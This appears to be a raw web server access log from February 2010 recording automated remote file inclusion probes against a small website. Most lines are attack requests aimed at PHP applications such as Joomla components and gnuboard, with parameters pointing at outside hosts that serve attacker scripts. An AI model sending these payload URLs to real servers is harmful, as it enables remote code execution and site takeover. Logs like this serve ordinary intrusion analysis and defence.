188.138.32.230 - - [06/Feb/2010:03:21:24 -0800] "GET /appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:03:21:24 -0800] "GET /logs//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:03:21:24 -0800] "GET /logs/access_100116.log//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:22:06 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfi%20g_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:22:06 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfi%20g_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:22:06 -0800] "GET /logs/access_100123.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfi%20g_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [06/Feb/2010:03:22:57 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [06/Feb/2010:03:22:57 -0800] "GET /logs/access_100116.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [06/Feb/2010:03:22:57 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:24:33 -0800] "GET /logs/access_100116.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfi%20g_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:24:33 -0800] "GET /logs/access.log///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:24:33 -0800] "GET //gnuboard4//bbs//write_comment_update.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:24:33 -0800] "GET /logs///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:25:00 -0800] "GET /logs/contact.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:25:00 -0800] "GET /contact.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:25:59 -0800] "GET /contact.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:25:59 -0800] "GET /logs/contact.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:26:22 -0800] "GET /logs/access.log%20%20///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:27:40 -0800] "GET /logs/access_100130.log%20%20//bbs//write_comment_update.php//delete_all.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:29:19 -0800] "GET //good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:29:19 -0800] "GET /logs///good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:29:40 -0800] "GET /mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:29:40 -0800] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:29:40 -0800] "GET /logs/access_091121.log%20%20//mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:29:44 -0800] "GET /logs///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:29:44 -0800] "GET /logs/access.log///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:29:44 -0800] "GET //gnuboard4//bbs//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:29:49 -0800] "GET /logs/access_091024.log%20%20//mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:30:50 -0800] "GET /logs/access_091121.log%20%20//mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:30:50 -0800] "GET /mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:30:50 -0800] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:03:30:50 -0800] "GET /logs/access_091024.log%20%20//mambots/content/multithumb/errors.php?error=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:31:52 -0800] "GET /logs/access.log%20%20///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:03:32:12 -0800] "GET /administrator/components/com_admin/admin.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:03:32:12 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_admin/admin.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:03:32:12 -0800] "GET /logs/administrator/components/com_admin/admin.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:03:34:34 -0800] "GET /administrator/components/com_admin/admin.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:03:34:35 -0800] "GET /logs/access_100123.log/administrator/components/com_admin/admin.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:03:34:35 -0800] "GET /logs/administrator/components/com_admin/admin.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:03:34:49 -0800] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:03:34:49 -0800] "GET /logs/access_100109.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:03:34:49 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:35:35 -0800] "GET /logs/access_100130.log%20%20///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://90plan.ovh.net/~elicityl//components/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:37:10 -0800] "GET /logs/access_100123.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfi%20g_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:37:10 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfi%20g_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:37:10 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfi%20g_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:39:43 -0800] "GET //good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:39:43 -0800] "GET /logs///good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:03:45:07 -0800] "GET /logs/access_100130.log%20%20///gnuboard4//bbs//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:47:48 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:47:48 -0800] "GET /delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:47:48 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:47:48 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:47:48 -0800] "GET /logs/access_091121.log//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:47:48 -0800] "GET /delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:48:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:48:29 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:48:29 -0800] "GET /delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:48:29 -0800] "GET /delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:48:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [06/Feb/2010:03:48:29 -0800] "GET /logs/access_091121.log//delete_all.php?board_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:03:53:18 -0800] "GET /logs/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:03:53:18 -0800] "GET /logs/access_091024.log%20%20/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:03:53:18 -0800] "GET /phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:54:50 -0800] "GET /config.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:54:50 -0800] "GET /logs/config.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:03:56:56 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:03:56:56 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:03:56:57 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:03:57:57 -0800] "GET /logs/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:03:57:57 -0800] "GET /phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:03:57:57 -0800] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:58:46 -0800] "GET /about.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:03:58:46 -0800] "GET /logs/about.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:03:58:49 -0800] "GET /logs/access_100123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:03:58:49 -0800] "GET /logs/access_100130.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:03:58:49 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:03:58:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:00:04 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:00:04 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:00:05 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:00:35 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:00:35 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:00:52 -0800] "GET /logs/access_100130.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:00:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:00:52 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:00:52 -0800] "GET /logs/access_100123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:02:53 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:02:53 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:02:54 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:03:14 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:03:15 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:03:15 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:04:03:31 -0800] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:04:03:31 -0800] "GET /phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:04:03:31 -0800] "GET /logs/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:04:31 -0800] "GET /config.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:04:31 -0800] "GET /logs/config.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:10:03 -0800] "GET /logs/access_100130.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:10:03 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:10:03 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:10:03 -0800] "GET /logs/access_100123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:18:39 -0800] "GET /about.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
